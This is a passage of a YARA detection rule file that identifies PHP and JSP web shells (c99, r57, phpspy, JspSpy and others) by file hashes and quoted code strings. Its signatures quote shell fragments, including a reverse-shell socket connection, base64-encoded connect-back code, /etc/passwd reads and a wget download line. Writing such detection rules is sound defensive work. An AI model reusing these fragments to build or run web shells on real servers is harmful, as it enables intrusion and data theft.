"Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "ef43fef943e9df90ddb6257950b3538f" hash1 = "ae025c886fbe7f9ed159f49593674832" hash2 = "911195a9b7c010f61b66439d9048f400" hash3 = "697dae78c040150daff7db751fc0c03c" hash4 = "513b7be8bd0595c377283a7c87b44b2e" hash5 = "1d912c55b96e2efe8ca873d6040e3b30" hash6 = "e5b2131dd1db0dbdb43b53c5ce99016a" hash7 = "4108f28a9792b50d95f95b9e5314fa1e" hash8 = "41af6fd253648885c7ad2ed524e0692d" hash9 = "6fcc283470465eed4870bcc3e2d7f14d" strings: $s2 = "echo sr(15,\"<b>\".$lang[$language.'_text58'].$arrow.\"</b>\",in('text','mk_name" $s3 = "echo sr(15,\"<b>\".$lang[$language.'_text21'].$arrow.\"</b>\",in('checkbox','nf1" $s9 = "echo sr(40,\"<b>\".$lang[$language.'_text26'].$arrow.\"</b>\",\"<select size=" condition: all of them } rule webshell_807_a_css_dm_he1p_JspSpy_xxx { meta: description = "Web Shell - from files 807.jsp, a.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, nogfw.jsp, ok.jsp, style.jsp, u.jsp, xia.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "ae76c77fb7a234380cd0ebb6fe1bcddf" hash1 = "76037ebd781ad0eac363d56fc81f4b4f" hash2 = "fc44f6b4387a2cb50e1a63c66a8cb81c" hash3 = "14e9688c86b454ed48171a9d4f48ace8" hash4 = "b330a6c2d49124ef0729539761d6ef0b" hash5 = "d71716df5042880ef84427acee8b121e" hash6 = "341298482cf90febebb8616426080d1d" hash7 = "29aebe333d6332f0ebc2258def94d57e" hash8 = "42654af68e5d4ea217e6ece5389eb302" hash9 = "88fc87e7c58249a398efd5ceae636073" hash10 = "4a812678308475c64132a9b56254edbc" hash11 = "9626eef1a8b9b8d773a3b2af09306a10" hash12 = "344f9073576a066142b2023629539ebd" hash13 = "32dea47d9c13f9000c4c807561341bee" hash14 = "b9744f6876919c46a29ea05b1d95b1c3" hash15 = "6acc82544be056580c3a1caaa4999956" hash16 = "6aa32a6392840e161a018f3907a86968" hash17 = "349ec229e3f8eda0f9eb918c74a8bf4c" hash18 = "3ea688e3439a1f56b16694667938316d" hash19 = "ab77e4d1006259d7cbc15884416ca88c" hash20 = "71097537a91fac6b01f46f66ee2d7749" hash21 = "2434a7a07cb47ce25b41d30bc291cacc" hash22 = "7a4b090619ecce6f7bd838fe5c58554b" strings: $s1 = "\"<h2>Remote Control »</h2><input class=\\\"bt\\\" onclick=\\\"var" $s2 = "\"<p>Current File (import new file name and new file)<br /><input class=\\\"inpu" $s3 = "\"<p>Current file (fullpath)<br /><input class=\\\"input\\\" name=\\\"file\\\" i" condition: all of them } rule webshell_201_3_ma_download { meta: description = "Web Shell - from files 201.jsp, 3.jsp, ma.jsp, download.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "a7e25b8ac605753ed0c438db93f6c498" hash1 = "fb8c6c3a69b93e5e7193036fd31a958d" hash2 = "4cc68fa572e88b669bce606c7ace0ae9" hash3 = "fa87bbd7201021c1aefee6fcc5b8e25a" strings: $s0 = "<input title=\"Upload selected file to the current working directory\" type=\"Su" $s5 = "<input title=\"Launch command in current directory\" type=\"Submit\" class=\"but" $s6 = "<input title=\"Delete all selected files and directories incl. subdirs\" class=" condition: all of them } rule webshell_browser_201_3_400_in_JFolder_jfolder01_jsp_leo_ma_warn_webshell_nc_download { meta: description = "Web Shell - from files browser.jsp, 201.jsp, 3.jsp, 400.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, ma.jsp, warn.jsp, webshell-nc.jsp, download.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "37603e44ee6dc1c359feb68a0d566f76" hash1 = "a7e25b8ac605753ed0c438db93f6c498" hash2 = "fb8c6c3a69b93e5e7193036fd31a958d" hash3 = "36331f2c81bad763528d0ae00edf55be" hash4 = "793b3d0a740dbf355df3e6f68b8217a4" hash5 = "8979594423b68489024447474d113894" hash6 = "ec482fc969d182e5440521c913bab9bd" hash7 = "f98d2b33cd777e160d1489afed96de39" hash8 = "4b4c12b3002fad88ca6346a873855209" hash9 = "4cc68fa572e88b669bce606c7ace0ae9" hash10 = "e9a5280f77537e23da2545306f6a19ad" hash11 = "598eef7544935cf2139d1eada4375bb5" hash12 = "fa87bbd7201021c1aefee6fcc5b8e25a" strings: $s4 = "UplInfo info = UploadMonitor.getInfo(fi.clientFileName);" fullword $s5 = "long time = (System.currentTimeMillis() - starttime) / 1000l;" fullword condition: all of them } rule webshell_shell_phpspy_2006_arabicspy { meta: description = "Web Shell - from files shell.php, phpspy_2006.php, arabicspy.php" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "791708057d8b429d91357d38edf43cc0" hash1 = "40a1f840111996ff7200d18968e42cfe" hash2 = "e0202adff532b28ef1ba206cf95962f2" strings: $s0 = "elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype" $s8 = "echo \"<form action=\\\"?action=shell&dir=\".urlencode($dir).\"\\\" method=\\\"P" condition: all of them } rule webshell_in_JFolder_jfolder01_jsp_leo_warn { meta: description = "Web Shell - from files in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, warn.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "793b3d0a740dbf355df3e6f68b8217a4" hash1 = "8979594423b68489024447474d113894" hash2 = "ec482fc969d182e5440521c913bab9bd" hash3 = "f98d2b33cd777e160d1489afed96de39" hash4 = "4b4c12b3002fad88ca6346a873855209" hash5 = "e9a5280f77537e23da2545306f6a19ad" strings: $s4 = "sbFile.append(\" <a href=\\\"javascript:doForm('down','\"+formatPath(strD" $s9 = "sbFile.append(\" <a href=\\\"javascript:doForm('edit','\"+formatPath(strDi" condition: all of them } rule webshell_2_520_icesword_job_ma1_ma4_2 { meta: description = "Web Shell - from files 2.jsp, 520.jsp, icesword.jsp, job.jsp, ma1.jsp, ma4.jsp, 2.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "64a3bf9142b045b9062b204db39d4d57" hash1 = "9abd397c6498c41967b4dd327cf8b55a" hash2 = "077f4b1b6d705d223b6d644a4f3eebae" hash3 = "56c005690da2558690c4aa305a31ad37" hash4 = "532b93e02cddfbb548ce5938fe2f5559" hash5 = "6e0fa491d620d4af4b67bae9162844ae" hash6 = "7eabe0f60975c0c73d625b7ddf7b9cbd" strings: $s2 = "private String[] _textFileTypes = {\"txt\", \"htm\", \"html\", \"asp\", \"jsp\"," $s3 = "\\\" name=\\\"upFile\\\" size=\\\"8\\\" class=\\\"textbox\\\" /> <input typ" $s9 = "if (request.getParameter(\"password\") == null && session.getAttribute(\"passwor" condition: all of them } rule webshell_phpspy_2005_full_phpspy_2005_lite_PHPSPY { meta: description = "Web Shell - from files phpspy_2005_full.php, phpspy_2005_lite.php, PHPSPY.php" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "b68bfafc6059fd26732fa07fb6f7f640" hash1 = "42f211cec8032eb0881e87ebdb3d7224" hash2 = "0712e3dc262b4e1f98ed25760b206836" strings: $s6 = "<input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_POST['comma" $s7 = "echo $msg=@copy($_FILES['uploadmyfile']['tmp_name'],\"\".$uploaddir.\"/\".$_FILE" $s8 = "<option value=\"passthru\" <? if ($execfunc==\"passthru\") { echo \"selected\"; " condition: 2 of them } rule webshell_shell_phpspy_2006_arabicspy_hkrkoz { meta: description = "Web Shell - from files shell.php, phpspy_2006.php, arabicspy.php, hkrkoz.php" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "791708057d8b429d91357d38edf43cc0" hash1 = "40a1f840111996ff7200d18968e42cfe" hash2 = "e0202adff532b28ef1ba206cf95962f2" hash3 = "802f5cae46d394b297482fd0c27cb2fc" strings: $s5 = "$prog = isset($_POST['prog']) ? $_POST['prog'] : \"/c net start > \".$pathname." condition: all of them } rule webshell_c99_Shell_ci_Biz_was_here_c100_v_xxx { meta: description = "Web Shell - from files c99.php, Shell [ci] .Biz was here.php, c100 v. 777shell v. Undetectable #18a Modded by 777 - Don.php, c66.php, c99-shadows-mod.php, c99shell.php" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "61a92ce63369e2fa4919ef0ff7c51167" hash1 = "f2fa878de03732fbf5c86d656467ff50" hash2 = "27786d1e0b1046a1a7f67ee41c64bf4c" hash3 = "0f5b9238d281bc6ac13406bb24ac2a5b" hash4 = "68c0629d08b1664f5bcce7d7f5f71d22" hash5 = "048ccc01b873b40d57ce25a4c56ea717" strings: $s8 = "else {echo \"Running datapipe... ok! Connect to <b>\".getenv(\"SERVER_ADDR\"" condition: all of them } rule webshell_2008_2009lite_2009mssql { meta: description = "Web Shell - from files 2008.php, 2009lite.php, 2009mssql.php" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "3e4ba470d4c38765e4b16ed930facf2c" hash1 = "3f4d454d27ecc0013e783ed921eeecde" hash2 = "aa17b71bb93c6789911bd1c9df834ff9" strings: $s0 = "<a href=\"javascript:godir(\\''.$drive->Path.'/\\');" $s7 = "p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all" condition: all of them } rule webshell_shell_phpspy_2005_full_phpspy_2005_lite_phpspy_2006_arabicspy_PHPSPY_hkrkoz { meta: description = "Web Shell - from files shell.php, phpspy_2005_full.php, phpspy_2005_lite.php, phpspy_2006.php, arabicspy.php, PHPSPY.php, hkrkoz.php" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "791708057d8b429d91357d38edf43cc0" hash1 = "b68bfafc6059fd26732fa07fb6f7f640" hash2 = "42f211cec8032eb0881e87ebdb3d7224" hash3 = "40a1f840111996ff7200d18968e42cfe" hash4 = "e0202adff532b28ef1ba206cf95962f2" hash5 = "0712e3dc262b4e1f98ed25760b206836" hash6 = "802f5cae46d394b297482fd0c27cb2fc" strings: $s0 = "$mainpath_info = explode('/', $mainpath);" fullword $s6 = "if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == \"d" condition: all of them } rule webshell_807_dm_JspSpyJDK5_m_cofigrue { meta: description = "Web Shell - from files 807.jsp, dm.jsp, JspSpyJDK5.jsp, m.jsp, cofigrue.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "ae76c77fb7a234380cd0ebb6fe1bcddf" hash1 = "14e9688c86b454ed48171a9d4f48ace8" hash2 = "341298482cf90febebb8616426080d1d" hash3 = "88fc87e7c58249a398efd5ceae636073" hash4 = "349ec229e3f8eda0f9eb918c74a8bf4c" strings: $s1 = "url_con.setRequestProperty(\"REFERER\", \"\"+fckal+\"\");" fullword $s9 = "FileLocalUpload(uc(dx())+sxm,request.getRequestURL().toString(), \"GBK\");" fullword condition: 1 of them } rule webshell_Dive_Shell_1_0_Emperor_Hacking_Team_xxx { meta: description = "Web Shell - from files Dive Shell 1.0 - Emperor Hacking Team.php, phpshell.php, SimShell 1.0 - Simorgh Security MGZ.php" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "1b5102bdc41a7bc439eea8f0010310a5" hash1 = "f8a6d5306fb37414c5c772315a27832f" hash2 = "37cb1db26b1b0161a4bf678a6b4565bd" strings: $s1 = "if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== fals" $s9 = "if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {" fullword condition: all of them } rule webshell_404_data_in_JFolder_jfolder01_xxx { meta: description = "Web Shell - from files 404.jsp, data.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, suiyue.jsp, warn.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "7066f4469c3ec20f4890535b5f299122" hash1 = "9f54aa7b43797be9bab7d094f238b4ff" hash2 = "793b3d0a740dbf355df3e6f68b8217a4" hash3 = "8979594423b68489024447474d113894" hash4 = "ec482fc969d182e5440521c913bab9bd" hash5 = "f98d2b33cd777e160d1489afed96de39" hash6 = "4b4c12b3002fad88ca6346a873855209" hash7 = "c93d5bdf5cf62fe22e299d0f2b865ea7" hash8 = "e9a5280f77537e23da2545306f6a19ad" strings: $s4 = " <TEXTAREA NAME=\"cqq\" ROWS=\"20\" COLS=\"100%\"><%=sbCmd.toString()%></TE" condition: all of them } rule webshell_jsp_reverse_jsp_reverse_jspbd { meta: description = "Web Shell - from files jsp-reverse.jsp, jsp-reverse.jsp, jspbd.jsp" author = "Florian Roth" date = "2014/01/28" super_rule = 1 hash0 = "8b0e6779f25a17f0ffb3df14122ba594" hash1 = "ea87f0c1f0535610becadf5a98aca2fc" hash2 = "7d5e9732766cf5b8edca9b7ae2b6028f" score = 50 strings: $s0 = "osw = new BufferedWriter(new OutputStreamWriter(os));" fullword $s7 = "sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());" fullword $s9 = "isr = new BufferedReader(new InputStreamReader(is));" fullword condition: all of them } rule webshell_400_in_JFolder_jfolder01_jsp_leo_warn_webshell_nc { meta: description = "Web Shell - from files 400.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, warn.jsp, webshell-nc.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "36331f2c81bad763528d0ae00edf55be" hash1 = "793b3d0a740dbf355df3e6f68b8217a4" hash2 = "8979594423b68489024447474d113894" hash3 = "ec482fc969d182e5440521c913bab9bd" hash4 = "f98d2b33cd777e160d1489afed96de39" hash5 = "4b4c12b3002fad88ca6346a873855209" hash6 = "e9a5280f77537e23da2545306f6a19ad" hash7 = "598eef7544935cf2139d1eada4375bb5" strings: $s0 = "sbFolder.append(\"<tr><td > </td><td>\");" fullword $s1 = "return filesize / intDivisor + \".\" + strAfterComma + \" \" + strUnit;" fullword $s5 = "FileInfo fi = (FileInfo) ht.get(\"cqqUploadFile\");" fullword $s6 = "<input type=\"hidden\" name=\"cmd\" value=\"<%=strCmd%>\">" fullword condition: 2 of them } rule webshell_2_520_job_JspWebshell_1_2_ma1_ma4_2 { meta: description = "Web Shell - from files 2.jsp, 520.jsp, job.jsp, JspWebshell 1.2.jsp, ma1.jsp, ma4.jsp, 2.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "64a3bf9142b045b9062b204db39d4d57" hash1 = "9abd397c6498c41967b4dd327cf8b55a" hash2 = "56c005690da2558690c4aa305a31ad37" hash3 = "70a0ee2624e5bbe5525ccadc467519f6" hash4 = "532b93e02cddfbb548ce5938fe2f5559" hash5 = "6e0fa491d620d4af4b67bae9162844ae" hash6 = "7eabe0f60975c0c73d625b7ddf7b9cbd" strings: $s1 = "while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {" fullword $s6 = "password = (String)session.getAttribute(\"password\");" fullword $s7 = "insReader = new InputStreamReader(proc.getInputStream(), Charset.forName(\"GB231" condition: 2 of them } rule webshell_shell_2008_2009mssql_phpspy_2005_full_phpspy_2006_arabicspy_hkrkoz { meta: description = "Web Shell - from files shell.php, 2008.php, 2009mssql.php, phpspy_2005_full.php, phpspy_2006.php, arabicspy.php, hkrkoz.php" author = "Florian Roth" date = "2014/01/28" score = 60 super_rule = 1 hash0 = "791708057d8b429d91357d38edf43cc0" hash1 = "3e4ba470d4c38765e4b16ed930facf2c" hash2 = "aa17b71bb93c6789911bd1c9df834ff9" hash3 = "b68bfafc6059fd26732fa07fb6f7f640" hash4 = "40a1f840111996ff7200d18968e42cfe" hash5 = "e0202adff532b28ef1ba206cf95962f2" hash6 = "802f5cae46d394b297482fd0c27cb2fc" strings: $s0 = "$tabledump .= \"'\".mysql_escape_string($row[$fieldcounter]).\"'\";" fullword $s5 = "while(list($kname, $columns) = @each($index)) {" fullword $s6 = "$tabledump = \"DROP TABLE IF EXISTS $table;\\n\";" fullword $s9 = "$tabledump .= \" PRIMARY KEY ($colnames)\";" fullword $fn = "filename: backup" condition: 2 of ($s*) and not $fn } rule webshell_gfs_sh_r57shell_r57shell127_SnIpEr_SA_xxx { meta: description = "Web Shell - from files gfs_sh.php, r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, r57.php, Backdoor.PHP.Agent.php" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "a2516ac6ee41a7cf931cbaef1134a9e4" hash1 = "ef43fef943e9df90ddb6257950b3538f" hash2 = "ae025c886fbe7f9ed159f49593674832" hash3 = "911195a9b7c010f61b66439d9048f400" hash4 = "697dae78c040150daff7db751fc0c03c" hash5 = "513b7be8bd0595c377283a7c87b44b2e" hash6 = "1d912c55b96e2efe8ca873d6040e3b30" hash7 = "e5b2131dd1db0dbdb43b53c5ce99016a" hash8 = "4108f28a9792b50d95f95b9e5314fa1e" hash9 = "41af6fd253648885c7ad2ed524e0692d" hash10 = "6fcc283470465eed4870bcc3e2d7f14d" strings: $s0 = "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI" $s11 = "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KIC" condition: all of them } rule webshell_itsec_PHPJackal_itsecteam_shell_jHn { meta: description = "Web Shell - from files itsec.php, PHPJackal.php, itsecteam_shell.php, jHn.php" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "8ae9d2b50dc382f0571cd7492f079836" hash1 = "e2830d3286001d1455479849aacbbb38" hash2 = "bd6d3b2763c705a01cc2b3f105a25fa4" hash3 = "40c6ecf77253e805ace85f119fe1cebb" strings: $s0 = "$link=pg_connect(\"host=$host dbname=$db user=$user password=$pass\");" fullword $s6 = "while($data=ocifetchinto($stm,$data,OCI_ASSOC+OCI_RETURN_NULLS))$res.=implode('|" $s9 = "while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+" condition: 2 of them } rule webshell_Shell_ci_Biz_was_here_c100_v_xxx { meta: description = "Web Shell - from files Shell [ci] .Biz was here.php, c100 v. 777shell v. Undetectable #18a Modded by 777 - Don.php, c99-shadows-mod.php" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "f2fa878de03732fbf5c86d656467ff50" hash1 = "27786d1e0b1046a1a7f67ee41c64bf4c" hash2 = "68c0629d08b1664f5bcce7d7f5f71d22" strings: $s2 = "if ($data{0} == \"\\x99\" and $data{1} == \"\\x01\") {return \"Error: \".$stri" $s3 = "<OPTION VALUE=\"find /etc/ -type f -perm -o+w 2> /dev/null\"" $s4 = "<OPTION VALUE=\"cat /proc/version /proc/cpuinfo\">CPUINFO" fullword $s7 = "<OPTION VALUE=\"wget http://ftp.powernet.com.tr/supermail/de" $s9 = "<OPTION VALUE=\"cut -d: -f1,2,3 /etc/passwd | grep ::\">USER" condition: 2 of them } rule webshell_NIX_REMOTE_WEB_SHELL_NIX_REMOTE_WEB_xxx1 { meta: description = "Web Shell - from files NIX REMOTE WEB-SHELL.php, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php, KAdot Universal Shell v0.1.6.php" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "0b19e9de790cd2f4325f8c24b22af540" hash1 = "f3ca29b7999643507081caab926e2e74" hash2 = "527cf81f9272919bf872007e21c4bdda" strings: $s1 = "<td><input size=\"48\" value=\"$docr/\" name=\"path\" type=\"text\"><input type=" $s2 = "$uploadfile = $_POST['path'].$_FILES['file']['name'];" fullword $s6 = "elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}" fullword $s7 = "if ($_POST['path']==\"\"){$uploadfile = $_FILES['file']['name'];}" fullword condition: 2 of them } rule webshell_c99_c99shell_c99_w4cking_Shell_xxx { meta: description = "Web Shell - from files c99.php, c99shell.php, c99_w4cking.php, Shell [ci] .Biz was here.php, acid.php, c100 v. 777shell v. Undetectable #18a Modded by 777 - Don.php, c66.php, c99-shadows-mod.php, c99.php, c99shell.php" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "61a92ce63369e2fa4919ef0ff7c51167" hash1 = "d3f38a6dc54a73d304932d9227a739ec" hash2 = "9c34adbc8fd8d908cbb341734830f971" hash3 = "f2fa878de03732fbf5c86d656467ff50" hash4 = "b8f261a3cdf23398d573aaf55eaf63b5" hash5 = "27786d1e0b1046a1a7f67ee41c64bf4c" hash6 = "0f5b9238d281bc6ac13406bb24ac2a5b" hash7 = "68c0629d08b1664f5bcce7d7f5f71d22" hash8 = "157b4ac3c7ba3a36e546e81e9279eab5" hash9 = "048ccc01b873b40d57ce25a4c56ea717" strings: $s0 = "echo \"<b>HEXDUMP:</b><nobr>" $s4 = "if ($filestealth) {$stat = stat($d.$f);}" fullword $s5 = "while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo \"<tr><td>\".$r" $s6 = "if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo \"DB " $s8 = "echo \"<center><b>Server-status variables:</b><br><br>\";" fullword $s9 = "echo \"<textarea cols=80 rows=10>\".htmlspecialchars($encoded).\"</textarea>" condition: 2 of them } rule webshell_2008_2009mssql_phpspy_2005_full_phpspy_2006_arabicspy_hkrkoz { meta: description = "Web Shell - from files 2008.php, 2009mssql.php, phpspy_2005_full.php, phpspy_2006.php, arabicspy.php, hkrkoz.php" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "3e4ba470d4c38765e4b16ed930facf2c" hash1 = "aa17b71bb93c6789911bd1c9df834ff9" hash2 = "b68bfafc6059fd26732fa07fb6f7f640" hash3 = "40a1f840111996ff7200d18968e42cfe" hash4 = "e0202adff532b28ef1ba206cf95962f2" hash5 = "802f5cae46d394b297482fd0c27cb2fc" strings: $s0 = "$this -> addFile($content, $filename);" fullword $s3 = "function addFile($data, $name, $time = 0) {" fullword $s8 = "function unix2DosTime($unixtime = 0) {" fullword $s9 = "foreach($filelist as $filename){" fullword condition: all of them } rule webshell_c99_c66_c99_shadows_mod_c99shell { meta: description = "Web Shell - from files c99.php, c66.php, c99-shadows-mod.php, c99shell.php" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "61a92ce63369e2fa4919ef0ff7c51167" hash1 = "0f5b9238d281bc6ac13406bb24ac2a5b" hash2 = "68c0629d08b1664f5bcce7d7f5f71d22" hash3 = "048ccc01b873b40d57ce25a4c56ea717" strings: $s2 = " if (unlink(_FILE_)) {@ob_clean(); echo \"Thanks for using c99shell v.\".$shv" $s3 = " \"c99sh_backconn.pl\"=>array(\"Using PERL\",\"perl %path %host %port\")," fullword $s4 = "<br><TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#66" $s7 = " elseif (!$data = c99getsource($bind[\"src\"])) {echo \"Can't download sources" $s8 = " \"c99sh_datapipe.pl\"=>array(\"Using PERL\",\"perl %path %localport %remotehos" $s9 = " elseif (!$data = c99getsource($bc[\"src\"])) {echo \"Can't download sources!" condition: 2 of them } rule webshell_he1p_JspSpy_nogfw_ok_style_1_JspSpy1 { meta: description = "Web Shell - from files he1p.jsp, JspSpy.jsp, nogfw.jsp, ok.jsp, style.jsp, 1.jsp, JspSpy.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "b330a6c2d49124ef0729539761d6ef0b" hash1 = "d71716df5042880ef84427acee8b121e" hash2 = "344f9073576a066142b2023629539ebd" hash3 = "32dea47d9c13f9000c4c807561341bee" hash4 = "b9744f6876919c46a29ea05b1d95b1c3" hash5 = "3ea688e3439a1f56b16694667938316d" hash6 = "2434a7a07cb47ce25b41d30bc291cacc" strings: $s0 = "\"\"+f.canRead()+\" / \"+f.canWrite()+\" / \"+f.canExecute()+\"</td>\"+" fullword $s4 = "out.println(\"<h2>File Manager - Current disk "\"+(cr.indexOf(\"/\") == 0?" $s7 = "String execute = f.canExecute() ? \"checked=\\\"checked\\\"\" : \"\";" fullword $s8 = "\"<td nowrap>\"+f.canRead()+\" / \"+f.canWrite()+\" / \"+f.canExecute()+\"</td>" condition: 2 of them } rule webshell_000_403_c5_config_myxx_queryDong_spyjsp2010_zend { meta: description = "Web Shell - from files 000.jsp, 403.jsp, c5.jsp, config.jsp, myxx.jsp, queryDong.jsp, spyjsp2010.jsp, zend.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "2eeb8bf151221373ee3fd89d58ed4d38" hash1 = "059058a27a7b0059e2c2f007ad4675ef" hash2 = "8b457934da3821ba58b06a113e0d53d9" hash3 = "d44df8b1543b837e57cc8f25a0a68d92" hash4 = "e0354099bee243702eb11df8d0e046df" hash5 = "90a5ba0c94199269ba33a58bc6a4ad99" hash6 = "655722eaa6c646437c8ae93daac46ae0" hash7 = "591ca89a25f06cf01e4345f98a22845c" strings: $s0 = "return new Double(format.format(value)).doubleValue();" fullword $s5 = "File tempF = new File(savePath);" fullword $s9 = "if (tempF.isDirectory()) {" fullword condition: 2 of them } rule webshell_c99_c99shell_c99_c99shell { meta: description = "Web Shell - from files c99.php, c99shell.php, c99.php, c99shell.php" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "61a92ce63369e2fa4919ef0ff7c51167" hash1 = "d3f38a6dc54a73d304932d9227a739ec" hash2 = "157b4ac3c7ba3a36e546e81e9279eab5" hash3 = "048ccc01b873b40d57ce25a4c56ea717" strings: $s2 = "$bindport_pass = \"c99\";" fullword $s5 = " else {echo \"<b>Execution PHP-code</b>\"; if (empty($eval_txt)) {$eval_txt = tr" condition: 1 of them } rule webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat { meta: description = "Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "ae025c886fbe7f9ed159f49593674832" hash1 = "513b7be8bd0595c377283a7c87b44b2e" hash2 = "1d912c55b96e2efe8ca873d6040e3b30" hash3 = "4108f28a9792b50d95f95b9e5314fa1e" hash4 = "3f71175985848ee46cc13282fbed2269" strings: $s6 = "$res = @mysql_query(\"SHOW CREATE TABLE `\".$_POST['mysql_tbl'].\"`\", $d" $s7 = "$sql1 .= $row[1].\"\\r\\n\\r\\n\";" fullword $s8 = "if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }" fullword $s9 = "foreach($values as $k=>$v) {$values[$k] = addslashes($v);}" fullword condition: 2 of them } rule webshell_NIX_REMOTE_WEB_SHELL_nstview_xxx { meta: description = "Web Shell - from files NIX REMOTE WEB-SHELL.php, nstview.php, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php, Cyber Shell (v 1.0).php" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "0b19e9de790cd2f4325f8c24b22af540" hash1 = "4745d510fed4378e4b1730f56f25e569" hash2 = "f3ca29b7999643507081caab926e2e74" hash3 = "46a18979750fa458a04343cf58faa9bd" strings: $s3 = "BODY, TD, TR {" fullword $s5 = "$d=str_replace(\"\\\\\",\"/\",$d);" fullword $s6 = "if ($file==\".\" || $file==\"..\") continue;" fullword condition: 2 of them } rule webshell_000_403_807_a_c5_config_css_dm_he1p_xxx { meta: description = "Web Shell - from files 000.jsp, 403.jsp, 807.jsp, a.jsp, c5.jsp, config.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, myxx.jsp, nogfw.jsp, ok.jsp, queryDong.jsp, spyjsp2010.jsp, style.jsp, u.jsp, xia.jsp, zend.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "2eeb8bf151221373ee3fd89d58ed4d38" hash1 = "059058a27a7b0059e2c2f007ad4675ef" hash2 = "ae76c77fb7a234380cd0ebb6fe1bcddf" hash3 = "76037ebd781ad0eac363d56fc81f4b4f" hash4 = "8b457934da3821ba58b06a113e0d53d9" hash5 = "d44df8b1543b837e57cc8f25a0a68d92" hash6 = "fc44f6b4387a2cb50e1a63c66a8cb81c" hash7 = "14e9688c86b454ed48171a9d4f48ace8" hash8 = "b330a6c2d49124ef0729539761d6ef0b" hash9 = "d71716df5042880ef84427acee8b121e" hash10 = "341298482cf90febebb8616426080d1d" hash11 = "29aebe333d6332f0ebc2258def94d57e" hash12 = "42654af68e5d4ea217e6ece5389eb302" hash13 = "88fc87e7c58249a398efd5ceae636073" hash14 = "4a812678308475c64132a9b56254edbc" hash15 = "9626eef1a8b9b8d773a3b2af09306a10" hash16 = "e0354099bee243702eb11df8d0e046df" hash17 = "344f9073576a066142b2023629539ebd" hash18 = "32dea47d9c13f9000c4c807561341bee" hash19 = "90a5ba0c94199269ba33a58bc6a4ad99" hash20 = "655722eaa6c646437c8ae93daac46ae0" hash21 